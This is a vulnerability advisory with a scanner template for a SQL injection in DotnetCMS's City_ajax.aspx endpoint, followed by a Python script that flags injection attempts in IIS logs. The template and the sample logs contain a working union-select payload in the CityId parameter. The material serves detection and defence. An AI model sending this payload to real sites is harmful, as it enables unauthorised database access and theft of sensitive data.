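Vulnerability description
The DotnetCMS city list endpoint has a SQL injection vulnerability. By crafting a malicious request, an attacker can execute arbitrary SQL statements and obtain sensitive information from the database.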
id: dotnetcms-sqli

info:
  name: DotnetCMS sqli
  author: unkown
  severity: high
  description: |-
    DotnetCMS 城市列表接口存在SQL注入漏洞,攻击者可以通过构造恶意请求,执行任意SQL语句,从而获取数据库中的敏感信息。
  tags: dotnetcms,sqli
  created: 2023/06/23

set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(1, 100)
rules:
  r0:
    request:
      method: GET
      path: /user/City_ajax.aspx
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
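
A defensive companion to the template above, added here as an example and not part of the original page or of DotnetCMS: it scans IIS W3C logs for requests to /user/City_ajax.aspx whose CityId is not a plain integer. The numeric-only rule for CityId, the log field layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/user/city_ajax.aspx"  # path from the template, compared case-insensitively
PARAM = "cityid"                   # parameter from the template, compared case-insensitively
NUMERIC = re.compile(r"\d{1,10}")  # assumption: a legitimate CityId is a short integer

# Constructed IIS W3C log lines (documentation IP ranges, made-up values).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2023-06-23 10:00:01 GET /user/City_ajax.aspx CityId=12 192.0.2.10 200
2023-06-23 10:00:05 GET /user/City_ajax.aspx CityId=37'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','900000001')),2-- 198.51.100.7 200
2023-06-23 10:00:09 GET /user/city_ajax.aspx cityid=5%27 198.51.100.7 500
2023-06-23 10:00:12 GET /index.aspx id=1%27 192.0.2.11 200
"""

def suspicious_requests(log_text):
    """Return (client_ip, status, decoded CityId) for each non-numeric CityId."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names follow the directive
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):      # skip malformed or truncated rows
            continue
        row = dict(zip(fields, parts))
        if row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        # parse_qs percent-decodes values, so %27 and a literal quote look the same
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for name, values in query.items():
            if name.lower() != PARAM:
                continue
            for value in values:
                if not NUMERIC.fullmatch(value):
                    hits.append((row["c-ip"], row["sc-status"], value))
    return hits

if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} CityId={value!r}")
```

A flagged request that returned status 200 deserves closer review than one that returned 500, since the template itself treats a 200 response containing the expected hash as confirmation.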